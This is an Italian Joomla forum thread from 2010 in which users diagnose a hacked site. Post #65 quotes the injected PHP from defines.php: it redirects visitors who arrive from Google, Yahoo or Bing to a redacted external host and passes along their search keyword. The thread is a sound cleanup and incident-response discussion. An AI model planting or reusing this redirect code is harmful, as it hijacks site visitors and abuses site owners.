Autore Topic: [RISOLTO] problema di virus sul sito (Letto 51261 volte)

mau_develop · « **Risposta #60 il:** 25 Feb 2010, 20:41:31 »

un link?

le cose elencate le hai fatte esattamente in quell'ordine?
hai cambiato le password dei servizi?
hai fatto un'approfondita scansione del pc con un antivirus?

M.

Otrebor1969 · « **Risposta #61 il:** 25 Feb 2010, 21:18:19 »

P.C. controllato... adesso cambio le password dei servizi

mau_develop · « **Risposta #62 il:** 25 Feb 2010, 22:10:06 »

assicurati anche che i files sono stati aggiornati realmente alla .15, a volte è solo un'illusione ; lo vedi dalle date dei files, fai un controllo sommario, o rifallo che non succede nulla.

Attenzione anche al browser, che sia aggiornato, ultimamente hanno favorito parecchi attacchi.

Dopodichè ti direi..... è tuo fratello che ti fa gli scherzi

M.

Otrebor1969 · « **Risposta #63 il:** 25 Feb 2010, 22:26:42 »

Non so più che fare... sono disarmato di fronte a questo problema... e poi non ho un fratello eheheh.
Ho controllato tutto ed a me sembra ok... Ho nuovamente cambiato i defines.php prendendoli dall'ultima versione di joomla ma nisba... forse sto saltando qualche passaggio? Ho ricontrollato le cartelle del backup con l'antivirus ed è tutto ok.

mau_develop · « **Risposta #64 il:** 25 Feb 2010, 23:08:20 »

O fallisce qualcosa che stai facendo, o non è possibile...

invece di cancellare i define aprili e guarda se c'è una stringa come quella che ho postato.

copia tutto in locale, copia un pezzetto della stringa p3. etc.. e cerca dove l'ha scritto...
non è un virus, non succede nulla in locale, funziona solo se nei referrer vieni da un motore di ricerca come google, bing etc..

Secondo me è una specie di auto pown che viene da qualche adv o worm che si infila nel browser quindi è indispensabile anche un controllo antivirus... ma è un "secondo me"...

Otrebor1969 · « **Risposta #65 il:** 26 Feb 2010, 15:02:19 »

DOMANDA: quale file era infetto oltre ai defines??
Scusa, riporto parte del tuo post per ricollegarmi al problema riscontrato da altro utente:
_______________________________________ _____
!"""""
Codice trovato, è lo stesso noto problema dell'iniezione del file defines.php nella cartella includes.

viene iniettato un codice in base64 che redirige:
if (stristr($_SERVER[HTTP_REFERER],"google")) { if (!stristr($_SERVER[HTTP_REFERER],".nu") and !stristr($_SERVER[HTTP_REFERER],"site") and !stristr($_SERVER[HTTP_REFERER],"inurl")){ preg_match ("/q\=(.*)/",$_SERVER[HTTP_REFERER],$kk); if (stristr($kk[1],"&")) { preg_match ("/(.*?)\&/",$kk[1],$key2); $keyword=urldecode($key2[1]); }else { $keyword=urldecode($kk[1]); } header("Location: http://xxxxxxxxxx.xxx.pl/?q=".$keyword); exit(); } }elseif (stristr($_SERVER[HTTP_REFERER],"yahoo")) { preg_match ("/p\=(.*?)&/",$_SERVER[HTTP_REFERER],$kk); header("Location: http://xxxxxxxxxxx.xxx.pl/?q=".$kk[1]); exit(); }elseif (stristr($_SERVER[HTTP_REFERER],"bing")) { preg_match ("/q\=(.*?)&/",$_SERVER[HTTP_REFERER],$kk); header("Location: http://xxxxxxxx.xxx.pl/?q=".$kk[1]); exit(); }

mau_develop · « **Risposta #66 il:** 26 Feb 2010, 15:19:05 »

quale file era infetto oltre ai defines?
----------------------------------------

nessuno!
1 solo file nella directory include...

...però visto che sostieni di sostituirlo sicuramente, cerco di sincerarmene anch'io...

- hai il problema quindi lo script da qualche parte esiste

- se cerchi la stringa $_SERVER[HTTP_REFERER],"google" all'interno di tutti i files del sito almeno sappiamo sicuramente dove la scrive

- se esiste in un solo file e tu lo sostituisci e si ricrea allora hai altri problemi

DEVI SOLO STARE ATTENTO a non fare confusione a mischiare file "buoni" e file iniettati, a controllare che ciò che carichi venga effettivamente caricato e sostituisca il file sporco.
TUTTI I FILES non vanno aggiornati, VANNO SOVRASCRITTI con l'ftp.

M.

Otrebor1969 · « **Risposta #67 il:** 26 Feb 2010, 15:37:48 »

Sto nuovamente scaricando la verione aggiornata di joomla... nel frattempo stiamo cercando la stringa incriminata in tutti i file del backup.... Ti tengo aggiornato

Otrebor1969 · « **Risposta #68 il:** 26 Feb 2010, 16:15:29 »

Ho fatto cercare con il finder di windows la striga incriminata ma niente ..... Ho completamente eliminato ozio gallery 2 nonostante l'aggiornamento e cancellato le cartelle e rimesso il file defines....suggeerimenti? E se prendessi tutti i file della versione aggiornata di joomla e li sparassi dentro cosa mi potrebbe accadere? Ad esempio se ci buttassi dentro tutto il contenuto del Joomla_1.5.15_ita-Stable.zip tranne il file di installazione?

mau_develop · « **Risposta #69 il:** 26 Feb 2010, 17:31:35 »

Ad esempio se ci buttassi dentro tutto il contenuto del Joomla_1.5.15_ita-Stable.zip tranne il file di installazione?
----------------------------------------------------------------
non succede nulla, puoi farlo tranquillamente, sempre che tu non abbia modificato qualcosa dell'installazione originale.

Cioè, si sovrascrive tutto ciò che era originale e basta.

non copiare nemmeno il configuration.php

M.

Argon · « **Risposta #70 il:** 26 Feb 2010, 19:00:09 »

Scusate l'intromissione, mi sorge un dubbio riguardo all'ftp...
ho lo stesso problema come descritto nel 3d che ho aperto.
Stringhe ovunque.
A me è successo che ho perso di colpo la bellezza di 8 siti.
Tutti bucati.
A parte un paio, erano siti di test su alter.
Mi sono messo a vedere quale componente avesse decimato tutto quello che avevo realizzato. I sospetti cadevano su sef404 e simple image gallery. Alla fine mi sono reso conto che il responsabile è filezilla: mi sono preso un trojan e con l'ftp l'ho distribuito in giro...è l'unica spiegazione possibile perchè non faccio altro che pulire lo spazio sul server, reistallare joomla e ritrovarmi il codice infetto. adesso formatto il pc per stare sicuro.
Che ne pensate?

mau_develop · « **Risposta #71 il:** 26 Feb 2010, 19:25:12 »

mmhhh...

dovresti provare ad installare un joomla nuovo in uno spazio nuovo o in uno piallato completamente, senza caricare nulla di quello vecchio, allora la tua tesi potrebbe essere valida

M.

56francesco · « **Risposta #72 il:** 26 Feb 2010, 19:30:28 »

Citazione

A me è successo che ho perso di colpo la bellezza di 8 siti.

che versione di joomla erano?
ora siamo alla 1.5.15

Argon · « **Risposta #73 il:** 26 Feb 2010, 19:46:19 »

Citazione da: mau_develop - 26 Feb 2010, 19:25:12

mmhhh...

dovresti provare ad installare un joomla nuovo in uno spazio nuovo o in uno piallato completamente, senza caricare nulla di quello vecchio, allora la tua tesi potrebbe essere valida

M.

Si
infatti ogni volta rimetto joomla nuovo nello spazio piallato ed ogni volta mi ritrovo la stringa...

inoltre ho ripescato 2 vecchi siti fatti in joomla che però non ho nel gestore siti di filezilla e combinazione sono puliti...

Argon · « **Risposta #74 il:** 26 Feb 2010, 19:55:44 »

Citazione da: 56francesco - 26 Feb 2010, 19:30:28

Citazione
A me è successo che ho perso di colpo la bellezza di 8 siti.
che versione di joomla erano?
ora siamo alla 1.5.15

Tranne uno rimasto alla 1.0 gli altri sono tutti all'ultima versione. E comunque seguendo i vostri consigli dove ho potuto ho aggiornato la versione alla 1.5.15 cambiato password, pulito tutto...ma nulla da fare. Anche aggiornando il problema permane.

Non credo che il problema sia joomla in se in quanto se carico sullo spazio un qualsiasi file html dopo un po me lo ritrovo infetto.

Se vuoi ti linko l'index così puoi vedere il codice...

mau_develop · « **Risposta #75 il:** 26 Feb 2010, 20:03:04 »

in quanto se carico sullo spazio un qualsiasi file html dopo un po me lo ritrovo infetto.
-----------------------------------------
ambè... qs direi che è significativo....

se guardi, anche pumacocina aveva trovato un virus.

mi spiace per te, sarebbe interessante sapere che virus è...
se hai problemi a rimuoverlo dimmelo che ti "spedisco" da una persona che qs problemi sono il suo pane

M.

Otrebor1969 · « **Risposta #76 il:** 26 Feb 2010, 22:52:29 »

Riepilogando:
1) eliminato filezilla (ora ne ho uno nuovo che non è filezilla);
2) installati e sovrascritti i file Joomla_1.5.15_ita-Stable.zip;
risultato NEGATIVO. Non è servito a niente...
L'asistenza tecnica di JoomlaHost riferisce:
"Buongiorno,
è un problema che deriva da una falla di sicurezza presente nel componente oziogallery,segnalata direttamente sul forum di joomla.it:
http://forum.joomla.it/index.php/topic,91159.0.html
e anche da un post su google:
http://www.google.com/support/forum/p/webmasters/thread?tid=29f6b8fa61898722&hl=it

grazie

Ora provo con l'unica copia di backup funzionante.... incrociamo le dita....
A nessun altro viene un'idea?

mau_develop · « **Risposta #77 il:** 26 Feb 2010, 23:44:42 »

beh a qs punto la prova del 9 sarebbe provare a fare tutto da un'altro pc, meglio se mai collegato con la rete in cui collegato normalmente il pc che usate.

A nessun altro viene un'idea?
------------------------------
eliminare filezilla non serve, un virus non "attacca" filezilla piuttosto che un altro, probabilmente attacca il servizio,... non so, presumo, non sono esperto di virus ne tantomeno di windows.
Visto quello che ha postato il tuo collega e non avendo motivi per sostenere che menta

penso che probl il problema potrebbe essere qs.

M.

mau_develop · « **Risposta #78 il:** 26 Feb 2010, 23:48:47 »

E cmq mi sembra strano non riuscire a risolvere, questi attacchi solitamente sono fatti con lo stampino, non credo che esistano personalizzazioni...
ho appena controllato il sito di pumacocina e va che è 'na meraviglia...

M.

Otrebor1969 · « **Risposta #79 il:** 26 Feb 2010, 23:56:09 »

Non capisco. Ci stiamo lavorando a 4 mani con un amico e siamo arrivati alla conclusione che forse sarebbe opportuno provare a reinstallare tutto.... In ogni caso sto anche ricontrollando per la presenza di virus, sarebbe l'ennesima volta in 2 giorni.. mah! vedremo